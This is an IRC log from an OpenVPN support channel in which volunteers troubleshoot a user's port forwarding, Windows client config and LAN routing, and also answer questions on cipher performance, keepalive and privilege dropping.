18:41 < p0rk> http://pastie.org/private/dzddbyllrqzyhnp0bsphq
18:41 < p0rk> im digging scp, thanks for that tip
18:42 <+pekster> Holy crap those are ugly rules
18:42 < p0rk> ill forget my anniversary and replace it with scp in the memory bank
18:42 <+pekster> You really need all those random high UDP ports forwarded?
18:42 < p0rk> those are dd-wrt rules 18:42 < p0rk> *shrug* 18:42 < p0rk> i dont know where they came from 18:42 < p0rk> in my dd-wrt interface i only have 8 forwards setup 18:43 <+pekster> You're sending udp/1194 traffic to a public IP 18:43 <+pekster> That's probably not what you wanted 18:43 < p0rk> i dont know how that is happening 18:43 <+pekster> And also why your server never gets them on a rfc1918 LAN 18:43 < p0rk> im about to wipe this router and reinstall dd-wrt 18:43 <+pekster> Yea, your rules look really hosed 18:43 < p0rk> is there like a factory reset for dd-wrt? 18:43 < p0rk> to get back to bone stock? 18:44 <+pekster> Unless you're able to fix your router yourself, yea 18:44 <+pekster> That DNAT target matches the IP you've connected here with, so that makes no sense at all 18:44 < p0rk> or maybe just reset the iptables? 18:44 <+pekster> Sure. I don't use dd-wrt, so I'm not sure how you clean-house on that OS 18:45 < p0rk> hmm 18:45 <+pekster> Oh, hold on a sec 18:45 < p0rk> ok 18:45 * walp waits for ping timeout 18:45 < p0rk> from me? 18:45 < p0rk> i noticed ive been dropping randomly 18:45 <+pekster> I'm mis-reading that (used to iptables-save, not -L) 18:45 < p0rk> ah 18:45 <+pekster> So, the nat entry appears okay actually, but it's not getting hit 18:46 <+pekster> (you still have a mess of other high random ports, but you can leave that in if you'd like, I guess) 18:46 <+pekster> So that router isn't even seeing inbound packets from your client 18:46 < p0rk> what the shit 18:46 <+pekster> Either the client isn't actually send it to your IP, or your ISP drops it 18:46 < p0rk> my other port forwards work though 18:46 < p0rk> for ssh, web, etc 18:46 <+pekster> Right. 
tcp/5222 is getting hit 18:46 <+pekster> See the hit counter is >0 18:46 < p0rk> my jabber server works 18:46 <+pekster> But not for the 1194 port 18:46 <+pekster> Right 18:46 < p0rk> http://www.dd-wrt.com/wiki/index.php/Hard_reset_or_30/30/30 18:47 <@vpnHelper> Title: Hard reset or 30/30/30 - DD-WRT Wiki (at www.dd-wrt.com) 18:47 < p0rk> im bout to try that hard reset 18:48 <+pekster> It won't hurt to get your rules to have less crap in them, but it probably won't fix the VPN packets getting lost 18:48 < p0rk> or maybe that second one 18:48 <+pekster> Your rules are a mess, but do appear to allow udp/1194 to be sent to 192.168.1.101 18:48 <+pekster> They just aren't arriving 18:48 < p0rk> but it doesnt look like it actually is 18:48 < p0rk> right 18:48 < walp> never heard of an ISP denying inbound VPN 18:48 < p0rk> its not my isp 18:49 <+pekster> Differnet IP 18:49 < p0rk> ive had it working before 18:49 <+pekster> The IP in your client config doesn't match the dst IP of those rules (which is also your IRC src IP) 18:49 <+pekster> DHCP residential customer I'm guessing? 18:49 <+pekster> Try a dynamic DNS service 18:49 < p0rk> yes 18:49 < p0rk> i have dynamic dns 18:49 < p0rk> i use afraid.org 18:49 <+pekster> http://pastie.org/pastes/6083496/text?key=fasfjxaz39bvzyshrnzp7q doens't use it 18:49 < walp> ^ gives you the highest of fives 18:49 <+pekster> You're connecting to some other random IP 18:50 < p0rk> pekster, thats not my config 18:50 < walp> that's mine 18:50 <+pekster> Oh, whopsie :\ 18:50 <+pekster> so, is your client using that IP, or a DNS name that resolves to it? 18:50 < p0rk> want me to pastie mine? 18:51 < p0rk> my client is using a domain 18:51 < p0rk> that resolves correctly 18:51 < p0rk> same domain i use for web and ssh 18:51 < p0rk> http://pastie.org/private/x8bisl6lbvephop7h6qtw 18:51 < p0rk> thats my config 18:51 < p0rk> i got from fys 18:51 < p0rk> earlier today 18:52 <+pekster> client resolves the IP listed in those iptables rules? 
18:52 <+pekster> Correct? 18:52 < p0rk> client resolves the ip im connected here with 18:52 < p0rk> my domain is n0sha.me 18:53 < walp> lol 18:53 <+pekster> Then another firewall between your router and client is blocking it 18:53 < p0rk> you can pull it up in a browser and it goes to an apache instance on the same server as the vpn 18:53 <+pekster> Could be the client, or it could be someone's ISP 18:53 <+pekster> And yea, that DNS entry resolves properly 18:53 < p0rk> i really think this is a bitched up router problem 18:53 < p0rk> ive tried from work, my dads house and my house 18:53 < p0rk> same problem everywhere 18:53 < walp> p0rk: try this from the client nc -u -v n0sha.me 1194 18:53 <+pekster> Could be that too. As I said, the actual ruleset *looks* okay, but it's messy as all gettup 18:54 < walp> n0sha.me [67.235.87.119] 1194 (openvpn) open 18:55 < p0rk> walp, ? 18:55 < walp> i can connect from my server to your vpn via udp packet to 1194 18:56 <+pekster> Or at least "something" on that IP. if the dnat hitcounter isn't going up it's not actually that host 18:56 < p0rk> the hell? 18:56 -!- midgaze [~mreid@155.229.21.75] has joined #openvpn 18:56 < walp> i can't authenticate obviously 18:56 <+pekster> p0rk: If you do 'iptables -t nat -nvL PREROUTING' do you see a hitcount >0 on the udp 1194 rule? 18:56 < p0rk> yea 18:56 < p0rk> that wasnt to you 18:56 < p0rk> lety me check 18:56 < p0rk> wheres the hitcount? 
18:57 < walp> pkts
18:57 <+pekster> I'm also registering the port as (likely) opened, compared to active refusals on other ports: http://fpaste.org/CyoQ/
18:57 < p0rk> 0's
18:57 <+pekster> Funny
18:57 <+pekster> So "something else" is eating the packets
18:58 < p0rk> wait
18:58 < p0rk> i have 2 different lines for that port
18:58 < p0rk> the bottom one is 0's
18:58 < p0rk> but up further is another one where UDP is 7
18:58 < walp> paste those lines
18:59 < p0rk> 7 197 DNAT udp -- * * 0.0.0.0/0 67.235.87.119 udp dpt:1194 to:192.168.1.101:1194
18:59 <+pekster> Okay, so that's probably from our connect attempts
18:59 <+pekster> So we can "get through" to your port
18:59 <+pekster> Assuming we stop trying now, you should see that go up when the client connects
18:59 <+pekster> If it doesn't, your client is never making it to your IP
18:59 <+pekster> The good news is that your tcpdump rule on that server will show such inbound traffic
19:00 <+pekster> (no need to use the hitcounters as a "poor man's tcpdump")
19:00 < walp> lolz
19:00 <+pekster> walp: I'm very good at abusing resources when the proper tools don't exist...
19:00 < walp> you'd have to be really poor i guess, tcpdump is free lol
19:00 <+pekster> targetless rules in the raw chain are quite helpful
19:00 <+pekster> Not free if you don't have a package for it (or space to install it on a router)
19:00 <+pekster> bytes are expensive sometimes
19:01 < walp> yeah true
19:01 <+pekster> raw table, that is
19:02 <+pekster> p0rk: So, watch that tcpdump output (or the hitcounters on the router if you'd prefer) and if nothing happens when the client connects, it's getting rejected before it even comes to you. Could be a client firewall stopping it, or any router between you and them
19:02 <+pekster> tcpdump the output interface of the client (wireshark if it's Windows) and that'll tell you if it's even leaving the client
19:03 < p0rk> back, sorry, kid needed attention
19:03 < walp> also, if you can, run `tcpdump -vv -nn dst port 1194` on the endpoint behind your router on the 192 IP
19:03 <+pekster> Best to use -p always when dumping
19:03 <+pekster> (unless you actually want PROMISC mode, it's best not to enable it on an interface that lacks it)
19:03 < p0rk> so i should try to connect and that 7 should go to 8?
19:04 < p0rk> its still 7
19:04 <+pekster> p0rk: Right. Or use the tcpdump rule on the server such as: tcpdump -pnvi eth0 udp port 1194
19:04 < p0rk> let me get my dad to try quick from his house
19:04 <+pekster> So, check your client as I said above
19:04 <+pekster> Are you doing this from inside your own network?
19:04 < p0rk> yea
19:04 < p0rk> im gonna have my dad try from outside
19:04 <+pekster> Should've asked that a while back. You can't do that
19:04 * walp goes to find butter knife
19:04 < p0rk> i was able to connect from within my network the last time
19:04 < p0rk> and i tried all day at work as well
19:05 <+pekster> Not with your current ruleset you can't
19:05 <+pekster> asymmetric routing
19:05 < p0rk> ok
19:05 < p0rk> im having my old man give it a whirl
19:05 <+pekster> Use your internal LAN IP if you want to "test" it, but you can't really do it like that and assume it works from outside
19:06 < p0rk> ok, my dad just tried and its still 7
19:07 < p0rk> ok, my dad just tried and its still 7
19:07 < p0rk> doh
19:08 < p0rk> is it worth changing the port to something else and trying?
19:09 <+pekster> One sec; I'm gunna try hitting your service with a bogus config on my end
19:09 < p0rk> ok
19:09 <+pekster> It won't accept your cert, but it'll show I can hit it fine
19:09 <+pekster> (that'll confirm it's an issue on your client end. I can nmap your port, so can walp, so it's obviously open)
19:09 < p0rk> ok
19:09 < StoneCypherAtWor> So I think I might be missing something about openvpn
19:10 < StoneCypherAtWor> I'm having that problem where I need everything to run elevated, except, if I run openvpn.exe directly as administrator, it doesn't know where the .ovpn config is, and if I run from the .ovpn file to start OpenVPN, it doesn't run as administrator
19:10 < StoneCypherAtWor> I ran OpenVPN-GUI as admin, but it seems to be a background process, and I'm not seeing an actual GUI
19:11 < p0rk> pekster, that 7 is now a 15
19:11 <+pekster> That was me
19:12 < p0rk> what the hell?
19:12 < StoneCypherAtWor> oh wait, i can just do it from a batch file and elevate the batch file, can't i
19:12 <+pekster> I can connect fine, and then of course my client rejects your server's cert (it doesn't match the fake CA I used) and cycles
19:12 < p0rk> am i using an old client maybe?
19:12 <+pekster> Your client's data isn't even getting to your server
19:12 <+pekster> It's not even a problem about version at this point
19:12 <+pekster> Firewall
19:12 <+pekster> It's a firewall *somewhere*
19:12 < p0rk> but how are you able to do it?
19:13 < p0rk> but i cant from every location i try?
19:13 < p0rk> should i try a different port?
19:14 <+pekster> No clue. Sure, if you'd like
19:14 <+pekster> The problem is between the client and your router (but not your router itself)
19:14 < p0rk> when i change ports, do i just connect via domain:port in the openvpn client then?
19:14 <+pekster> My config looks like this, and I can reach your system just fine: http://fpaste.org/Mgqo/
19:14 <+pekster> Obviously that's not valid (my ca.crt doesn't match your actual CA) but I am connecting to your server with that
19:15 < p0rk> ok wait
19:15 <+pekster> If you keep logs you'll see some hits for a failed login with a "bogus" user
19:15 <+pekster> (that was me)
19:15 < p0rk> where does your client config come from?
19:15 < p0rk> thats probably the friggin problem
19:15 <+pekster> huh? It comes from my text editor ;)
19:15 < p0rk> i thought i only needed a server cert to connect
19:16 <+pekster> StoneCypherAtWor: OpenVPN GUI sits in your system tray when started
19:16 < p0rk> my clients are all windows clients
19:17 < p0rk> so i need a config file dropped into program files/openvpn/config?
19:17 < p0rk> along with ca.crt?
19:17 <+pekster> StoneCypherAtWor: If you want the UI frontend for Windows, start the GUI with elevated privileges. It reads configs out of \config\
19:17 <+pekster> Actually that applies to you too then p0rk
19:17 <+pekster> Yes
19:17 < p0rk> that is 100% the problem
19:17 <+pekster> Technically you can call openvpn.exe manually and point it at a config file, but the GUI thing expects the config files to live in the path I just noted
19:17 < p0rk> none of the machines i tried from have client configs
19:17 < p0rk> just the ca.crt
19:18 <+pekster> Then how the heck do you expect them to connect?
19:18 < p0rk> *sigh*
19:18 < p0rk> i dont know
19:18 <+pekster> !sample
19:18 <@vpnHelper> "sample" is (#1) http://www.ircpimps.org/openvpn.configs for a working sample config or (#2) DO NOT use these configs until you understand the commands in them, read up on each first column of the configs in the manpage (see !man) or (#3) these configs are for a basic multi-user vpn, which you can then build upon to add lans or internet redirecting
19:18 <+pekster> !howto
19:18 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
19:18 < p0rk> i feel like the biggest dumbass
19:18 <+pekster> You need to follow those more carefully
19:20 <+pekster> Don't just copy my config since it won't match your setup
19:20 < p0rk> i know
19:20 < p0rk> im trying to find how to make one
19:20 <+pekster> k, just in case, I figured I'd warn you about that
19:20 < StoneCypherAtWor> per: oh, so it does
19:21 < StoneCypherAtWor> and it crashes when i try to connect.
19:21 < StoneCypherAtWor> hurrah.
19:21 < StoneCypherAtWor> is openvpn-gui known to work in win8?
19:22 <+pekster> Yup. You on 2.3.0?
19:23 < StoneCypherAtWor> uh. about box doesn't say. re: gui or re: openvpn?
19:23 <+pekster> OpenVPN
19:23 <+pekster> Your installed programs control thingy should know
19:23 <+pekster> or openvpn.exe --version
19:24 < StoneCypherAtWor> yes
19:24 < StoneCypherAtWor> 64 bit mingw32 build
19:24 <+pekster> I ran both 32 and 64-bit versions in the win8 developer preview fine, and people here have used it on RTM, so it doesn't crash across the board
19:24 < StoneCypherAtWor> k.
19:24 <+pekster> Not to say there isn't something else wrong on your end. Is it consistent? If so, try uninstalling and reinstalling (it'll save your config files when you do that)
19:25 <+pekster> Failing that, try the 32-bit version I guess...
19:25 < StoneCypherAtWor> well, i'll have to reboot; after the crash it doesn't seem to want to talk again
19:25 < p0rk> pekster, since im using client-cert-not-required and username-as-common-name do i still need the declarations in the client config for anything other than ca.crt?
19:25 < StoneCypherAtWor> bbiab
19:25 <+pekster> StoneCypherAtWor: Oh, maybe just the GUI crashed
19:25 <+pekster> p0rk: No need for cert or key, no
19:25 < p0rk> ok
19:26 < p0rk> can you look at my client config for me?
19:26 <+pekster> p0rk: See my config for a sample reference. You don't want any of the cipher/auth/keysize/tran-window crap. Or the cd line. You DO want MITM protection:
19:26 <+pekster> !mitm
19:26 <@vpnHelper> "mitm" is (#1) http://openvpn.net/index.php/documentation/howto.html#mitm to know about stopping Man-in-the-Middle attacks by signing the server cert specially or (#2) use !servercert to generate the server cert manually or use the easy-rsa build-key-server script to build your server certificates or (#3) then use: ns-cert-type server in the client config
19:26 <+pekster> Sure, paste it and I'll have a look
19:26 < p0rk> http://pastie.org/private/9rfmk2wwpfcipy7goby6a
19:27 <+pekster> You need at minimum 'pull' in there too. Optionally, use 'client' which implies pull and tls-client
19:27 < p0rk> just replace tls-client with client?
19:27 <+pekster> Sure
19:27 <+pekster> (it's a helper directive. See --client in the manpage)
19:28 < p0rk> otherwise everything is ok?
19:28 <+pekster> Minus your lack of MITM protection, yes. I guess since you don't issue client certs you can't really care about that
19:29 <+pekster> (if you ever did issue a client cert, that would be a potential security issue. See the bot output above for why)
19:29 < p0rk> ok
19:29 < p0rk> hm
19:29 < p0rk> still nothing
19:29 < p0rk> im having my dad do it
19:29 <+pekster> !forget mitm 3
19:29 <@vpnHelper> Error: You don't have the factoids.forget capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified.
19:30 <+pekster> p0rk: You probably need to use a full path to ca.crt
19:30 <+pekster> Unless it's in whatever dir the GUI chdir's to
19:30 < StoneCypherAtWor> so
19:30 <+pekster> Usually ca "C:\\some\\where\\ca.crt"
19:30 < StoneCypherAtWor> yes, openvpn-gui crashes regularly, but it establishes the connection successfully before it goes
19:30 < StoneCypherAtWor> which, i guess, is good enough
19:31 <+pekster> StoneCypherAtWor: Yea, I suspected that moments after you left to reboot. Sort of weird. Maybe you can try an uninstall/reinstall (it'll save your config files) or try the 32-bit version if that fails?
19:31 < p0rk> something still isnt right
19:31 <+pekster> Once in a blue moon my GUI will crash like you said (openvpn.exe lives on) but it's very rare for me. Not at all consistent or reproducible
19:31 < p0rk> im not seeing the hitcount go up when my dad does it like it did for you
19:32 <+pekster> p0rk: Did you actually send the ca.crt and verify the path to it was correct?
19:32 < StoneCypherAtWor> pekster: i will, but not today - i have to get something done very rapidly
19:32 < p0rk> yes
19:32 < p0rk> he has client.conf and ca.crt in his config directory of his client
19:33 <+pekster> Client logs at verb 4 are the next step. If the client won't connect it'll say why (or a timeout will occur after 60 seconds of trying)
19:33 < p0rk> it just gives the same old error it always has
19:33 < p0rk> woah
19:33 < p0rk> wait
19:34 < p0rk> Unable to obtain Session ID from n0sha.me:443: XML-RPC: ConnectionRefusedError: 10061: No connection could be made because the target machine actively refused it..
19:34 < p0rk> that says port 443
19:34 <+pekster> Wrong config then
19:34 < p0rk> how the hell?
19:35 <+pekster> The GUI doesn't like to pick up changes to >1 configs unless you restart it
19:35 <+pekster> You're clearly using the wrong config file, which also explains why it failed to connect before
19:36 < p0rk> what other config would it use?
19:36 < p0rk> i dont have another one
19:36 <+pekster> StoneCypherAtWor: Fair enough. If you ask taskmanager to kill the openvpn.exe process, I *think* it asks nicely before killing it more hastily, so it should even shut down clean for you when you're done
19:36 <+pekster> p0rk: It's apparently using another config bound for 443
19:37 < p0rk> ok, now the hit counter is going up
19:38 < p0rk> but im getting the same error
19:38 < p0rk> but the port is right
19:40 <+pekster> If the hitcount goes up it shouldn't be rejecting you based on "actively refused" anymore
19:40 < p0rk> finally got it
19:41 < p0rk> the directions on the website are wrong
19:41 < p0rk> its not client.conf
19:41 <+pekster> That's for Linux/Unix
19:41 <+pekster> howto guide is 100% correct
19:41 <+pekster> If you followed a different guide, perhaps it's wrong
19:42 <+pekster> reference: http://openvpn.net/index.php/open-source/documentation/howto.html#config
19:42 <@vpnHelper> Title: HOWTO (at openvpn.net)
19:42 < p0rk> yea i must have
19:42 <+pekster> "Note that on Linux, BSD, or unix-like OSes, the sample configuration files are named server.conf and client.conf. On Windows they are named server.ovpn and client.ovpn."
19:43 * p0rk slits wrist
19:44 <+pekster> Just follow the guides more carefully next time. In most cases it's rarely that someone discovered a new bug (although sometimes that happens too. Just rarely.)
19:45 < p0rk> thank you soooo much pekster
19:46 < p0rk> i appreciate your help and patience
19:53 < p0rk> so my dad is connected in, but he cant access any machines on my lan
19:53 < p0rk> is that because it put him on a 10.0. ip and everything is on 192.168?
20:17 <+pekster> p0rk:
20:17 <+pekster> !serverlan
20:17 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png
20:31 < p0rk> ok
20:31 < p0rk> i enabled ip forwarding
20:32 < p0rk> and i changed my push line to read:
20:32 < p0rk> push "route 192.168.1.0 255.255.255.0"
20:32 < p0rk> my servers are all on 192.168.1.* addresses on my local lan
20:32 < p0rk> so that should do it, right?
20:42 < jforman> hi all. i've recently been seeing lots of entries in my openvpn server log that look like "IP packet with unknown IP version=15 seen". no src or destination listed. is there a tcpdump flag i can use to figure out what might be causing these entries?
20:49 < p0rk> i added those settings, enabled ip forwarding, set eth0 into promiscuous mode but my client still cant see any other servers on the lan
20:49 < p0rk> please help
21:09 < p0rk> do i also need the push command in my client config?
21:33 * ecrist looks in
23:27 <+pekster> p0rk: Don't use promisc. You probably need your firewall fixed
23:29 <+pekster> jforman: Is that a tap or tun setup?
23:44 <+pekster> Then you failed to follow the flowchart you were linked
23:44 <+pekster> Erm, bad paste
23:45 <+pekster> jforman: Near as I can tell, that will occur in a tap setup when an Ethernet packet has an invalid IP protocol field. You can try something like 'tcpdump -pnvi tap0 not ip and not ipv6' perhaps?
--- Day changed Thu Feb 07 2013
00:27 < RealRancor> Hi everyone. Just a short question: Is the debian package available here: http://repos.openvpn.net/repos/apt/squeeze-snapshots/ a real snapshot or the final of openvpn 2.3.0 and just at the wrong place?
00:27 <@vpnHelper> Title: Index of /repos/apt/squeeze-snapshots/ (at repos.openvpn.net)
00:30 <+pekster> RealRancor: looks like 2.3.0 final based on timestamps of the other formal releases that were all signed on that same date
00:35 < RealRancor> pekster: Yes, noticed the same. But i wasn't really sure.
00:37 < RealRancor> There is an entry in the changelog of this package: "Preparing for v2.3.0 (David Sommerseth, d690047)", so i wasn't really sure if this is the final.
01:07 < hid3> Hello everyone. I need to run OpenVPN on a really old/slow CPU. Is there any way I can reduce CPU usage and gain some performance? I have already turned off the compression. Is there any way to lower the encryption level so that I'll save a few more CPU cycles?
01:10 < cosmicgate> get a ssd
01:11 < hid3> Any real advice?
01:13 < JyZyXEL> what kind of settings do i need to have automatic reconnecting for a client that uses wifi that can sometimes drop out?
01:20 <+pekster> JyZyXEL: --ping and --ping-restart
01:20 <+pekster> See the manpage for those (or the --keepalive option). See also:
01:20 <+pekster> !keepalive
01:20 <@vpnHelper> "keepalive" is (#1) see --keepalive in the manual for how to make clients retry connecting if they get disconnected. or (#2) basically it is a wrapper for managing --ping and --ping-restart in server/client mode or (#3) if you use this, don't use --tls-exit and also avoid --single-session and --inactive
01:30 < cosmicgate> hid3: get a ssd
01:31 <+pekster> That won't help CPU consumption...
01:34 < hid3> Indeed
01:34 <+pekster> hid3: blowfish symmetric crypto (the default) is one of your lowest CPU choices, at least if you want strong crypto (choices like rc4 are awful, and I'm not sure will even give you realistic improvements in CPU.)
01:34 < hid3> Besides, I was asking about software optimizations, not hardware
01:34 < hid3> and besides, there aren't SSDs with 68-pin SCSI or 40-pin IDE connectors
01:34 <+pekster> BF has higher times for re-keying (1/h by default) but that won't block traffic flow when it sets up new keys
01:35 < hid3> pekster: what about aes-128-cbc? Isn't it faster than BF?
01:35 < hid3> I also found some 'fast-io' option, hope this also helps
01:36 <+pekster> bf 128 is generally going to be faster than AES, unless you've got a hardware crypto module
01:36 < hid3> great, thanks
01:37 <+pekster> Are you actually capping out your CPU when you load up the VPN?
01:37 < hid3> One more thing: is there any point in reducing client/server certificate bits from 1024 down to 384 in order to boost the performance, at least a little bit?
01:37 <+pekster> Also, if you're multi-core, know that openvpn is single-threaded, so you'd need to distribute the load across $nCPU instances evenly to get max yield
01:37 < hid3> In fact, yes, the CPU is being used at 65-80% when a client is connected
01:37 <+pekster> No, the X509 keypairs are only used for the TLS channel
01:38 < hid3> yep, I'm multi-CPU and I'm aware of OpenVPN being single-threaded
01:38 < hid3> and not sure if I can make it use more than one CPU
01:39 <+pekster> Sort of like ssh, a larger keysize only impacts the initial connection (and technically things like session rekeys, but that's not impacting your traffic flow)
01:39 < hid3> Oh, I see
01:39 <+pekster> >1 instance is the only way to get openvpn to leverage multiple CPUs. That only applies if you have multiple users online at once
01:39 < hid3> No! Only one client :)
01:40 <+pekster> Short of disabling crypto there's not much you can do then. Might as well run sit/GRE instead at that point
01:40 < hid3> BTW, why was that guy suggesting getting an SSD? How would THAT help? I have my status file completely disabled... And I thought OpenVPN is inside RAM, not HDD
01:40 <+pekster> Or price out a nice atom CPU? :P
01:40 <+pekster> Yea, no clue on that suggestion; it was obviously poor
01:41 < hid3> pekster: considering Atom but not at this time (already have a few ones but for different apps. Satisfied!)
01:41 < hid3> well, I just need a satisfactory OpenVPN connection at this time. Not much of turbo/ultra fast/stable, etc
01:42 <+pekster> I can get fairly decent speeds on my embedded router running at I think 400 MHz with 32M RAM total (including for the kernel, etc)
01:42 <+pekster> At least, decent across most Internet links you find today
01:42 <+pekster> (sure, locally there's nothing like 100 or 1000-Base-T)
01:42 < hid3> With encryption completely off, right?
01:43 <+pekster> No, with crypto. It wasn't a problem when I deployed some of these units at my last regular gig to a dozen of the perma-remote staff at that job, including our CEO
01:43 <+pekster> s/our/their/
01:44 < hid3> Well, I'm from Lithuania, we have one of the fastest Internet links in Europe. 1 Gbps local traffic (to Lithuania networks) and ~800 Mbps to foreign networks ;-)
01:44 <+pekster> Yea, to get anywhere *near* those kinds of speeds with symmetric encryption of network data you're gunna need much better hardware
01:45 <+pekster> Consider looking at hardware AES devices if you're building a box to fill a specific need like that
01:45 < hid3> no, again, as I said. Just a decent connection (15-25 Mbps would be enough) :)
01:46 <+pekster> I don't have the benchmark data in front of me, but I was pretty sure I could get around that with my crappy $30 Asus embedded router...
01:46 < hid3> Similar case here. My server was originally made (in France, BTW) in 1998-1999
01:47 < hid3> And yes, it still works!
01:47 < hid3> The only upgrades were some additional Gigabit NICs and larger SCSI HDDs
01:48 <+pekster> You could try to benchmark some cipher tests via openssl. For example, comparing bf-cbc with aes-128-cbc: 'openssl speed bf-cbc aes-128-cbc'
01:48 < hid3> Nowadays I've never seen a server made in some Euro country. Usually it's Taiwan, Malaysia, China, etc.
01:48 <+pekster> That'll show you bps processing at various block sizes
01:49 < hid3> wow, great, didn't know that. I'll try this out!
01:49 <+pekster> At low block sizes (like you get with stream processing: eg openvpn) blowfish is usually between 1.5 - 3 times faster
01:49 < hid3> looks like BF is slightly faster at smaller block sizes...
01:50 < hid3> yep, true :)
01:50 <+pekster> AES hardware skews that massively toward AES, of course (openssl probably needs some evp/engine value to use it if you have one)
01:52 < hid3> BF is almost 5 times faster than des-ede3 ;-)
01:52 < hid3> OpenVPN is great. It has got a reasonably fast compression method by default.
01:52 <+pekster> Yea, and triple-DES is falling out of some popularity for that primary reason
01:53 <+pekster> Indeed: lzo is a stream compressor, so it's not nearly as good as dictionary-based solutions (zip, gzip, bzip, lzma, etc) but it can be processed in realtime
01:54 < hid3> well, I don't see any point in compression unless you're using a dial-up
01:54 <+pekster> Depends if CPU or bandwidth is a bigger blocker for throughput
01:55 < hid3> Neither should be these days. Pretty fast connectivity (well, at least where I live) and pretty fast CPUs.. Almost everyone has got no less than 60-80 Mbps at home and an average Core i3 CPU
01:57 <+pekster> After initial burst, my (fairly typical for US broadband) cable download peaks at around 15 Mbps. It's also about 3x the cost of broadband service compared to Sweden, for example
01:57 <+pekster> You can get faster here, but you tend to pay for it dearly
01:58 < hid3> Wow
01:58 < hid3> I thought people live better in North America
01:58 <+pekster> Welcome to land of the 2nd world, over-priced ISP service ;)
01:58 < hid3> but why is it so?
01:58 <+pekster> Monopolies mostly
01:59 < hid3> oh yeah. We have monopolies here. Electricity power, home heating, food sellers, etc
01:59 <+pekster> Some ISPs toy with monthly bandwidth caps ranging from 150GB/mo to 300GB/mo. 6 years or so back I was on a "soft cap" of 250G, but they didn't really do anything unless they wanted to. We're officially "Uncapped" again, although I'm sure they call customers who eat unusually large amounts
02:00 <+pekster> As much as it's a pain here, I hear Canada has it slightly worse (if that's possible)
02:00 <+pekster> Similar prices, but some providers have really low bandwidth caps
02:00 < hid3> Electricity is getting expensive. like $0.30/kWh. Home heating is also expensive. It's almost equal to an average month's salary in a cold winter month
02:01 <+pekster> Yea, that's pricey. We're I think $0.07 USD/kWh for the local electric grid now
02:01 <+pekster> Central US, just under Canada, so not the most expensive electric cost in the country
02:01 < hid3> 300 GB is a daily traffic for most of us :)
02:01 <+pekster> Yea... :(
02:02 <+pekster> fwiw, I ran through some cbc openssl speed tests, and on my Celeron 2.3GHz processor in my headless VPN box, nothing goes faster than BF at the lower block sizes
02:03 <+pekster> Nothing even comes close, so unless you get better/different results, you're probably just out of luck
02:03 < hid3> I'm sure I'll just leave the BF alone. I'll need to try the 'fast-io' option
02:04 < hid3> Is there any benefit of running OpenVPN as a different user, not root?
02:04 <+pekster> Yup, see --user and --group
02:05 < hid3> I suspect this option is for paranoid/security people
02:05 < hid3> And what's the benefit of that?
02:05 <+pekster> You probably also want/need the --persist-key and maybe --persist-tun options too
02:05 < hid3> I have them both, already
02:05 <+pekster> Downgrade runtime user in the event of some future attack of the protocol that allows an attacker to execute code as the UID of the process
02:05 <+pekster> "extra protection" basically. "just in case" ;)
02:07 < hid3> yeah. For paranoid people
02:07 <+pekster> The general unix mentality is 'run with as few privileges as possible' versus the Windows version of "if you don't run as an admin, lots of stuff (may) not work"
02:08 <+pekster> sudo runs circles around the equivalent "runas" functionality of Windows
02:09 < JyZyXEL> should i use --persist-tun with --keepalive 10 120 ?
02:09 <+pekster> JyZyXEL: Those options have nothing to do with one another
02:09 <+pekster> Sure, you can use both if you'd like, but they're not related
02:11 < JyZyXEL> i feel that it would be good
02:11 <+pekster> --persist-tun is more or less required to handle restarts (USR1 or HUP) when you downgrade the runtime user with --user
02:14 < JyZyXEL> i wonder if there is something else i would want
02:15 <+pekster> --do-my-laundry-and-make-coffee ?
02:17 < walp> --load-bowl
02:32 <+pekster> Here ya go (actual laundry-performing and coffee-making functionality is, naturally, missing.) http://pekster.sdf.org/misc/openvpn-laundry-coffee.patch
02:49 <+pekster> Results: http://fpaste.org/3fK8/
02:50 <+pekster> I love open-source code
02:56 <+pekster> hid3: In all seriousness, I'd be curious if you get a noticeable speed improvement with --fast-io
04:14 < angs> why do I get permission denied for this operation
04:14 < angs> root@ubuntu:/etc/openvpn/2.0# ./vars
04:14 < angs> bash: ./vars: Permission denied
04:16 <+pekster> You need to source it, not execute it
04:17 < angs> thank you pekster
04:17 < angs> how can I source it?
04:18 <+pekster> the source command, or the alias "." (you'll notice all the guides have you do: . ./vars for that reason)
04:18 <+pekster> See also:
04:18 <+pekster> !howto
04:18 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
04:18 < angs> thank you
05:22 < jforman> pekster: sorry for the delay, it is a tun setup. let me try that tcpdump cli and see what shows up
05:23 < y4h0> hey
05:24 < y4h0> can i configure openvpn to use only passwords for authentication ?
05:28 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 252 seconds]
05:29 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
05:49 -!- angs [~ubuntu@46-236-109-10.customer.t3.se] has quit [Remote host closed the connection]
06:03 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 246 seconds]
06:08 -!- gedO_ [~quassel@esc.ortopedija.lt] has joined #openvpn
06:08 -!- gedO [~quassel@esc.ortopedija.lt] has joined #openvpn
06:11 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn
06:15 -!- defswork [~andy@141.0.50.105] has joined #openvpn
06:16 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Client Quit]
06:19 -!- Burgundy [~burgundy@5-12-190-68.residential.rdsnet.ro] has joined #openvpn
06:22 -!- gedO [~quassel@esc.ortopedija.lt] has quit [Remote host closed the connection]
06:22 -!- gedO_ [~quassel@esc.ortopedija.lt] has quit [Remote host closed the connection]
06:29 -!- benedikt [~benedikt@unaffiliated/benedikt] has joined #openvpn
06:30 < benedikt> I have an odd use-case. I have set up an openvpn server, that NATs the VPN subnet onto the internet.
06:30 < benedikt> I want to connect to this VPN with a linux host that is also a NAT server for its internal network
06:30 < benedikt> so that hosts on the internal network are routed something like
06:30 < benedikt> internal -> linux nat -> openvpn nat -> internet
06:31 < benedikt> the linux box can connect and works fine, but clients on the internal network lose connection with the internet
